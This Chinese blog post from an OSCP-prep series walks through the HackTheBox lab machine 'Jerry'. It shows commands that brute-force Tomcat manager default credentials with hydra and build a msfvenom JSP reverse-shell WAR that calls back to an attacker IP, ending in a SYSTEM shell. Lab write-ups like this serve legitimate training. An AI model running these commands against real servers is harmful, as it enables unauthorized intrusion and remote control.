EthanDoctor

OSCP备考_0x46_HackThBox靶机_Windows_ jerry

Ethan医生2周前靶场19

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.136.9 (扫描TCP)

image.png

发现是tomcat直接测试看看能不能爆破登入,上传war包

 hydra -C  /usr/share/wordlists/SecLists/Passwords/Default-Credentials/tomcat-betterdefaultpasslist.txt  http-get://10.129.136.9:8080/manager/html

image.png


msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.16.43 LPORT=8888 -f war > shell_8888.war

上传WAR包获取反弹SHELL


image.png

直接就是system权限


标签: OSCP
返回列表

上一篇:OSCP备考_0x45_HackThBox靶机_Windows_ bounty

下一篇:OSCP备考_0x47_HackThBox靶机_Windows_conceal

相关文章

OSCP备考_0x56_HackThBox靶机_Windows_worker

OSCP备考_0x56_HackThBox靶机_Windows_worker

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.2.29 (扫描TCP)svn list svn://10.129.2.29svn lo...

OSCP备考_0x23_HackThBox靶机_Linux_mango

OSCP备考_0x23_HackThBox靶机_Linux_mango

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.108.26 (扫描TCP)nmap -sU --top-ports 100 ...

OSCP备考_0x42_HackThBox靶机_Windows_grandpa

OSCP备考_0x42_HackThBox靶机_Windows_grandpa

grandpanmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.95.233 (扫描TCP)跟上个靶场好像davtest -url 10....

OSCP备考_0x34_HackThBox靶机_time

OSCP备考_0x34_HackThBox靶机_time

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.107.34 (扫描TCP)nmap -sU --top-ports 100 ...

OSCP备考_0x22_Vulnhub靶机_symfonos: 5

OSCP备考_0x22_Vulnhub靶机_symfonos: 5

名称说明靶机下载链接https://www.vulnhub.com/entry/symfonos-52,415/攻击机(kali)ip:192.168.233.168靶机(CentOS)ip:192....

OSCP备考_0x52_HackThBox靶机_Windows_Buff

OSCP备考_0x52_HackThBox靶机_Windows_Buff

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.25.107 (扫描TCP)打开8080然后就是使用EXP然后就获取到SHELL然后EA...

发表评论    

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。

Copyright Your hacksec.top Rights Reserved.

Powered By Z-BlogPHP. - 鄂ICP备2025099786号